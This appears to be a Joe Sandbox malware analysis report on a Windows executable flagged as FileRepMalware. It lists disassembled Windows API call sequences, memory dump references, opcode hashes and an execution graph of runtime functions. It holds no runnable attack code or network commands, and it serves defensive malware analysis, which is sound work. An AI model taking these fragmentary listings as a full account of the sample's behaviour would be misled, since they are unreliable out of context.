                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2987980305-0
                                                                                                                                                                  • Opcode ID: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
                                                                                                                                                                  • Instruction ID: 67208966b8f2bf19d9e960a2271e5cf927c7fdd1345161600271a48ac580282b
                                                                                                                                                                  • Opcode Fuzzy Hash: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
                                                                                                                                                                  • Instruction Fuzzy Hash: 48215B36904215EBDF216FA58E4DAAE7970AF44314F20423BFA01B22E0CBBC4941965E
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402374
                                                                                                                                                                  • lstrlenA.KERNEL32(0040A440,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
                                                                                                                                                                  • RegSetValueExA.ADVAPI32(?,?,?,?,0040A440,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023CD
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,0040A440,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024B0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateValuelstrlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1356686001-0
                                                                                                                                                                  • Opcode ID: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
                                                                                                                                                                  • Instruction ID: 7eaf0ec052d83a67d7bbddc98f61bbb11a40701f4c7c8ad3ea5d843478098636
                                                                                                                                                                  • Opcode Fuzzy Hash: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
                                                                                                                                                                  • Instruction Fuzzy Hash: 2211A271E00108BFEB10EFA5DE89EAF7678EB40758F20403AF505B31D0D6B85D019A69
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CharNextA.USER32(00405500,?,C:\,00000000,004057B2,C:\,C:\,?,?,?,00405500,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 0040575C
                                                                                                                                                                  • CharNextA.USER32(00000000), ref: 00405761
                                                                                                                                                                  • CharNextA.USER32(00000000), ref: 00405770
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CharNext
                                                                                                                                                                  • String ID: C:\
                                                                                                                                                                  • API String ID: 3213498283-3404278061
                                                                                                                                                                  • Opcode ID: df1f57800bc78783e49fb04f649057cff683ac7abc20f7779ba38a9a2f776efc
                                                                                                                                                                  • Instruction ID: 0cb000f169cdbbf2d5b9b6229b91127b5992dce5cf428481544f57f275cdbada
                                                                                                                                                                  • Opcode Fuzzy Hash: df1f57800bc78783e49fb04f649057cff683ac7abc20f7779ba38a9a2f776efc
                                                                                                                                                                  • Instruction Fuzzy Hash: 3FF0A762904A25D6EB3322A85C44F6B57ACDB55725F140477E100BB1D192BC4C82AFEA
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetDC.USER32(?), ref: 00401D3F
                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000), ref: 00401D46
                                                                                                                                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D55
                                                                                                                                                                  • CreateFontIndirectA.GDI32(0040B044), ref: 00401DA7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CapsCreateDeviceFontIndirect
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3272661963-0
                                                                                                                                                                  • Opcode ID: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
                                                                                                                                                                  • Instruction ID: d817c33c406d5a72f0d35d0353d877ca697365183e6ac762242a66cad999de2e
                                                                                                                                                                  • Opcode Fuzzy Hash: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
                                                                                                                                                                  • Instruction Fuzzy Hash: DFF06871A482C0AFE70167709F5AB9B3F64D712305F104476F251BA2E3C77D14448BAD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • DestroyWindow.USER32(00000000,00000000,00402DD1,00000001), ref: 00402C04
                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402C22
                                                                                                                                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                                                                                                                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2102729457-0
                                                                                                                                                                  • Opcode ID: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
                                                                                                                                                                  • Instruction ID: af7afb5c67b035eb61978086e86d3b64d4827bf2199b448f7584534e2ab44da5
                                                                                                                                                                  • Opcode Fuzzy Hash: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
                                                                                                                                                                  • Instruction Fuzzy Hash: 46F0E270A0D260ABC3746F66FE8C98F7BA4F744B017400876F104B11E9CA7858C68B9D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 00404E39
                                                                                                                                                                  • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404EA7
                                                                                                                                                                    • Part of subcall function 00403ECF: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403EE1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                                                                                  • Opcode ID: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
                                                                                                                                                                  • Instruction ID: a1b1c3265e10147a864b820895246e20bcc7fdce94b5a9a997a836c51e1a414d
                                                                                                                                                                  • Opcode Fuzzy Hash: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
                                                                                                                                                                  • Instruction Fuzzy Hash: 4C113D71500218ABDB215F51DC44E9B3B69FB44759F00803AFA18691D1C77C5D619FAE
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • FreeLibrary.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00000000,?,0040355D,00403366,00000020), ref: 0040359F
                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 004035A6
                                                                                                                                                                  Strings
                                                                                                                                                                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403597
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Free$GlobalLibrary
                                                                                                                                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                                                                                                                  • API String ID: 1100898210-2382934351
                                                                                                                                                                  • Opcode ID: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
                                                                                                                                                                  • Instruction ID: 66eb0e2672836502cdeb887367c424fec6a3009010210fcd00c586b28cfd98d1
                                                                                                                                                                  • Opcode Fuzzy Hash: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
                                                                                                                                                                  • Instruction Fuzzy Hash: 45E0C233900130A7CB715F44EC0475A776C6F49B22F010067ED00772B0C3742D424BD8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe,80000000,00000003), ref: 00405707
                                                                                                                                                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe,80000000,00000003), ref: 00405715
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CharPrevlstrlen
                                                                                                                                                                  • String ID: C:\Users\user\Desktop
                                                                                                                                                                  • API String ID: 2709904686-3976562730
                                                                                                                                                                  • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                                                                                                                                  • Instruction ID: 28705abfcf709d76dd5e93a9f01d56f8a4c6275228320a945a5a59c68c4d3cd5
                                                                                                                                                                  • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                                                                                                                                  • Instruction Fuzzy Hash: 21D0A762409D709EF30363148C04B9F7A88CF12300F0904A2E580A3191C2785C414BBD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
                                                                                                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405833
                                                                                                                                                                  • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405841
                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 190613189-0
                                                                                                                                                                  • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                                                                                                                                  • Instruction ID: 367b043075f01b00bc0f53d251d01435816a13b74582d12395b7b535bec4825a
                                                                                                                                                                  • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                                                                                                                                  • Instruction Fuzzy Hash: 2BF02737208D51AFC2026B255C0092B7F94EF91310B24043EF840F2180E339A8219BBB
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Execution Graph

                                                                                                                                                                  Execution Coverage:13.4%
                                                                                                                                                                  Dynamic/Decrypted Code Coverage:5.5%
                                                                                                                                                                  Signature Coverage:3.2%
                                                                                                                                                                  Total number of Nodes:1887
                                                                                                                                                                  Total number of Limit Nodes:22
                                                                                                                                                                  execution_graph 18274 1a101b 18277 1b0431 18274->18277 18280 1b03f6 18277->18280 18281 1b041a 18280->18281 18282 1b0413 18280->18282 18289 1b8b48 18281->18289 18286 1b8acb 18282->18286 18285 1a1020 18287 1b8b48 __onexit 42 API calls 18286->18287 18288 1b8add 18287->18288 18288->18285 18292 1b8894 18289->18292 18293 1b88a0 ___BuildCatchObject 18292->18293 18300 1b6866 EnterCriticalSection 18293->18300 18295 1b88ae 18301 1b88ef 18295->18301 18297 1b88bb 18311 1b88e3 18297->18311 18300->18295 18302 1b890a 18301->18302 18303 1b897d pre_c_initialization __crt_fast_encode_pointer 18301->18303 18302->18303 18304 1b895d 18302->18304 18314 1c282d 18302->18314 18303->18297 18304->18303 18306 1c282d __onexit 42 API calls 18304->18306 18308 1b8973 18306->18308 18307 1b8953 18309 1b7805 ___vcrt_freefls@4 14 API calls 18307->18309 18310 1b7805 ___vcrt_freefls@4 14 API calls 18308->18310 18309->18304 18310->18303 18342 1b68ae LeaveCriticalSection 18311->18342 18313 1b88cc 18313->18285 18315 1c283a 18314->18315 18316 1c2855 18314->18316 18315->18316 18317 1c2846 18315->18317 18318 1c2864 18316->18318 18323 1c7f19 18316->18323 18319 1b6094 __dosmaperr 14 API calls 18317->18319 18330 1b737e 18318->18330 18322 1c284b ___scrt_fastfail 18319->18322 18322->18307 18324 1c7f39 HeapSize 18323->18324 18325 1c7f24 18323->18325 18324->18318 18326 1b6094 __dosmaperr 14 API calls 18325->18326 18327 1c7f29 18326->18327 18328 1b5b05 ___std_exception_copy 39 API calls 18327->18328 18329 1c7f34 18328->18329 18329->18318 18331 1b738b 18330->18331 18332 1b7396 18330->18332 18333 1b7330 ___crtLCMapStringA 15 API calls 18331->18333 18334 1b739e 18332->18334 18340 1b73a7 __Getctype 18332->18340 18338 1b7393 18333->18338 18335 1b7805 ___vcrt_freefls@4 14 API calls 18334->18335 18335->18338 18336 1b73ac 18339 1b6094 __dosmaperr 14 API calls 18336->18339 18337 1b73d1 HeapReAlloc 18337->18338 18337->18340 18338->18322 18339->18338 18340->18336 18340->18337 18341 1b7d4d new 2 API calls 18340->18341 18341->18340 18342->18313 15997 1b053a 15998 1b0546 ___BuildCatchObject 15997->15998 16018 1b0257 15998->16018 16000 1b054d 16003 1b0576 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock _Atexit 16000->16003 16072 1b0828 IsProcessorFeaturePresent 16000->16072 16002 1b0595 ___BuildCatchObject 16003->16002 16004 1b0615 16003->16004 16076 1b8233 16003->16076 16029 1b8820 16004->16029 16012 1b0646 16014 1b064f 16012->16014 16092 1b820e 16012->16092 16095 1b03ce 16014->16095 16019 1b0260 16018->16019 16101 1b0a2c IsProcessorFeaturePresent 16019->16101 16023 1b0271 16028 1b0275 16023->16028 16112 1b8c76 16023->16112 16026 1b028c 16026->16000 16028->16000 16030 1b8829 16029->16030 16032 1b0629 16029->16032 16435 1b857a 16030->16435 16033 1a2015 16032->16033 16807 1b0fa0 16033->16807 16037 1abc26 16087 1b0943 GetModuleHandleW 16037->16087 16038 1abc16 ___scrt_fastfail 16038->16037 16039 1abca2 VirtualAlloc 16038->16039 16816 1a1ff8 16039->16816 16044 1abdfc 41 API calls 16045 1abd00 16044->16045 16046 1abdfc 41 API calls 16045->16046 16047 1abd10 16046->16047 16822 1a1961 CoInitialize CoCreateInstance VariantInit 16047->16822 16049 1abd21 16837 1ae11f 16049->16837 16053 1abd44 16864 1abdf2 16053->16864 16056 1ae11f 41 API calls 16057 1abd65 16056->16057 16867 1a1e58 16057->16867 16059 1abd6c 16060 1abdf2 39 API calls 16059->16060 16061 1abd77 16060->16061 16892 1a1a9f CoInitialize 16061->16892 16063 1abd88 16918 1a1e53 16063->16918 16066 1abdf2 39 API calls 16067 1abda5 16066->16067 16068 1abdf2 39 API calls 16067->16068 16069 1abdb0 16068->16069 16070 1abdf2 39 API calls 16069->16070 16071 1abdbb 16070->16071 16071->16037 16073 1b083e ___scrt_fastfail 16072->16073 16074 1b08e6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16073->16074 16075 1b0930 16074->16075 16075->16000 16077 1b8249 pre_c_initialization 16076->16077 16078 1ba67d ___BuildCatchObject 16076->16078 16077->16004 16079 1bb37c __Getctype 39 API calls 16078->16079 16080 1ba68e 16079->16080 16081 1b72ec __purecall 39 API calls 16080->16081 16082 1ba6b8 pre_c_initialization 16081->16082 16083 1b6094 __dosmaperr 14 API calls 16082->16083 16086 1ba6f7 pre_c_initialization 16082->16086 16084 1ba6ed 16083->16084 16085 1b5b05 ___std_exception_copy 39 API calls 16084->16085 16085->16086 16086->16004 16088 1b063c 16087->16088 16088->16012 16089 1b8259 16088->16089 16090 1b804b _Atexit 21 API calls 16089->16090 16091 1b826a 16090->16091 16091->16012 16093 1b804b _Atexit 21 API calls 16092->16093 16094 1b8219 16093->16094 16094->16014 16096 1b03da 16095->16096 16097 1b03f0 16096->16097 18051 1b8c88 16096->18051 16097->16002 16099 1b03e8 16100 1b49b1 ___vcrt_uninitialize 8 API calls 16099->16100 16100->16097 16102 1b026c 16101->16102 16103 1b4988 16102->16103 16104 1b498d ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 16103->16104 16123 1b4d48 16104->16123 16108 1b49a3 16109 1b49ae 16108->16109 16137 1b4d84 16108->16137 16109->16023 16111 1b499b 16111->16023 16178 1c289a 16112->16178 16115 1b49b1 16116 1b49ba 16115->16116 16117 1b49cb 16115->16117 16118 1b4cbe ___vcrt_uninitialize_ptd 6 API calls 16116->16118 16117->16028 16119 1b49bf 16118->16119 16120 1b4d84 ___vcrt_uninitialize_locks DeleteCriticalSection 16119->16120 16121 1b49c4 16120->16121 16431 1b4956 16121->16431 16124 1b4d51 16123->16124 16126 1b4d7a 16124->16126 16127 1b4997 16124->16127 16141 1b48d6 16124->16141 16128 1b4d84 ___vcrt_uninitialize_locks DeleteCriticalSection 16126->16128 16127->16111 16129 1b4c8b 16127->16129 16128->16127 16159 1b47eb 16129->16159 16131 1b4c95 16132 1b4ca0 16131->16132 16164 1b4899 16131->16164 16132->16108 16134 1b4cae 16135 1b4cbb 16134->16135 16169 1b4cbe 16134->16169 16135->16108 16138 1b4dae 16137->16138 16139 1b4d8f 16137->16139 16138->16111 16140 1b4d99 DeleteCriticalSection 16139->16140 16140->16138 16140->16140 16146 1b46ca 16141->16146 16143 1b48f0 16144 1b48f9 16143->16144 16145 1b490d InitializeCriticalSectionAndSpinCount 16143->16145 16144->16124 16145->16144 16150 1b46fa 16146->16150 16151 1b46fe __crt_fast_encode_pointer 16146->16151 16147 1b471e 16149 1b472a GetProcAddress 16147->16149 16147->16151 16149->16151 16150->16147 16150->16151 16152 1b476a 16150->16152 16151->16143 16153 1b4792 LoadLibraryExW 16152->16153 16154 1b4787 16152->16154 16155 1b47ae GetLastError 16153->16155 16158 1b47c6 16153->16158 16154->16150 16157 1b47b9 LoadLibraryExW 16155->16157 16155->16158 16156 1b47dd FreeLibrary 16156->16154 16157->16158 16158->16154 16158->16156 16160 1b46ca ___vcrt_FlsSetValue 5 API calls 16159->16160 16161 1b4805 16160->16161 16162 1b481d TlsAlloc 16161->16162 16163 1b480e 16161->16163 16163->16131 16165 1b46ca ___vcrt_FlsSetValue 5 API calls 16164->16165 16166 1b48b3 16165->16166 16167 1b48cd TlsSetValue 16166->16167 16168 1b48c2 16166->16168 16167->16168 16168->16134 16170 1b4cc8 16169->16170 16171 1b4cce 16169->16171 16173 1b4825 16170->16173 16171->16132 16174 1b46ca ___vcrt_FlsSetValue 5 API calls 16173->16174 16175 1b483f 16174->16175 16176 1b4856 TlsFree 16175->16176 16177 1b484b 16175->16177 16176->16177 16177->16171 16179 1c28aa 16178->16179 16180 1b027e 16178->16180 16179->16180 16183 1bb7cd 16179->16183 16195 1bb71d 16179->16195 16180->16026 16180->16115 16184 1bb7d9 ___BuildCatchObject 16183->16184 16200 1b6866 EnterCriticalSection 16184->16200 16186 1bb7e0 16201 1c2b2b 16186->16201 16193 1bb71d 2 API calls 16194 1bb7fe 16193->16194 16220 1bb824 